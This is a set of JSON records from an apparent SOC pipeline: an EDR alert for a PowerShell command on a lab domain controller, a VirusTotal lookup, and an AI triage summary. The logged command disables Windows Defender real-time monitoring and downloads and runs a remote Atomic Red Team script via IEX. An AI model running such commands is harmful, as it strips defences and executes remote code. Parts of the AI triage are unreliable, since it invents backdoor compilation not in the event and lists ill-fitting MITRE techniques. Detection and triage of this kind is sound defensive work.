{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 150003712,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4497408,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 644,
        "THIS_ATOM": "f6c3ef3bd7e0803778897af369c2a83c",
        "THREADS": 3,
        "TIMESTAMP": 1774364731328,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 644,
      "PROCESS_ID": 4708,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
      "event_time": 1774364731901,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3226,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "f6c3ef3bd7e0803778897af369c2a83c",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "abf4184fcffb7c87575b024b69c2a83e"
    }
  },
  "detect_id": "c0a35d9e-c2ad-402d-a643-2b4969c2a83f",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364735130,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364731\u0026selected=abf4184fcffb7c87575b024b69c2a83e",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
    "event_time": 1774364731901,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3226,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "f6c3ef3bd7e0803778897af369c2a83c",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "abf4184fcffb7c87575b024b69c2a83e"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364735000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other hosts have been compromised using similar techniques?",
    "Were there any prior indicators of compromise before this event?",
    "Is the SYSTEM account used for legitimate administrative tasks on this host?"
  ],
  "ioc_analysis": "The command line contains multiple high-risk indicators: disabling Windows Defender (Set-MpPreference), using Invoke-Expression with remote script execution (IEX), and downloading the Atomic Red Team framework. The process is running under SYSTEM privileges from System32, which is suspicious for legitimate system binaries but consistent with attacker persistence techniques.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force",
    "Invoke-AtomicTest T1115"
  ],
  "mitre_techniques": [
    "T1567.001",
    "T1547.001",
    "T1059.001",
    "T1203.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com and redcanaryco domains",
    "Review all PowerShell execution policies on the system",
    "Scan for persistence mechanisms in C:\\Windows\\TEMP directory",
    "Check for additional processes spawned by Atomic Red Team framework"
  ],
  "risk_score": 85,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where PowerShell is executing commands to disable antivirus real-time monitoring and download the Atomic Red Team framework via IEX. The process tree shows compilation of C# code to persistent backdoors, indicating active exploitation rather than benign maintenance.\n\n**IOC Analysis:** The command line contains multiple high-risk indicators: disabling Windows Defender (Set-MpPreference), using Invoke-Expression with remote script execution (IEX), and downloading the Atomic Red Team framework. The process is running under SYSTEM privileges from System32, which is suspicious for legitimate system binaries but consistent with attacker persistence techniques.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nA PowerShell process running as SYSTEM attempted to disable Windows Defender real-time monitoring and install Atomic Red Team, indicating suspicious activity despite legitimate file and hash indicators.\n\n**IOC Analysis:** The FILE_PATH is a legitimate system binary in C:\\Windows\\System32\\WindowsPowerShell\\v1.0, and the HASH is signed, suggesting it could be Microsoft-signed. However, the command line shows malicious intent by disabling security features and downloading/installing tools like Atomic Red Team.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}